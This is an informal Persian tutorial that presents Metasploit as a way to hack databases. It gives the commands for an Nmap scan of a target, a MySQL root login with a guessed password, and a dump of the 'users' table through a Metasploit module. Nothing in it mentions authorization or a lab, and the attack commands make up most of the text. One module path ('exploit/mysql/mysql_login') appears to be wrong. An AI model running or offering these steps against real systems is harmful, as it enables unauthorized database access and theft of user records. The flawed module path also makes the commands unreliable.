Metasploit یه ابزار گاده که میتونه بهت کمک کنه تا پایگاههای داده رو هک کنی. این فریمورک متنبازه و کلی امکانات داره که میتونه بهت کمک کنه تا سیستمها و پایگاههای داده رو تست کنی. حالا بیا ببینیم چطوری میشه ازش استفاده کرد.
apt-get install metasploit-framework
نصبش کنی.اول باید سیستم هدف رو شناسایی کنی. میتونی از Nmap استفاده کنی:
nmap -sV 192.168.1.1
این دستور بهت نشون میده که چه پورتهایی بازه و چه سرویسهایی در حال اجراست.
بعد از اینکه سیستم هدف رو شناسایی کردی، باید آسیبپذیریها رو پیدا کنی. میتونی از Nessus یا OpenVAS استفاده کنی یا مستقیماً از Metasploit اسکن کنی.
حالا وقتشه که از Exploit استفاده کنی. مثلاً اگه سیستم هدف از MySQL استفاده میکنه و آسیبپذیره، میتونی از ماژول mysql_login استفاده کنی:
msfconsole
use exploit/mysql/mysql_login
set RHOSTS 192.168.1.1
set USERNAME root
set PASSWORD password
exploit
بعد از اینکه Exploit موفقیتآمیز بود، میتونی به پایگاهداده دسترسی پیدا کنی. از ماژولهای Metasploit استفاده کن و دستورات SQL رو اجرا کن:
use auxiliary/admin/mysql/mysql_sql
set RHOSTS 192.168.1.1
set USERNAME root
set PASSWORD password
set SQL "SELECT * FROM users;"
run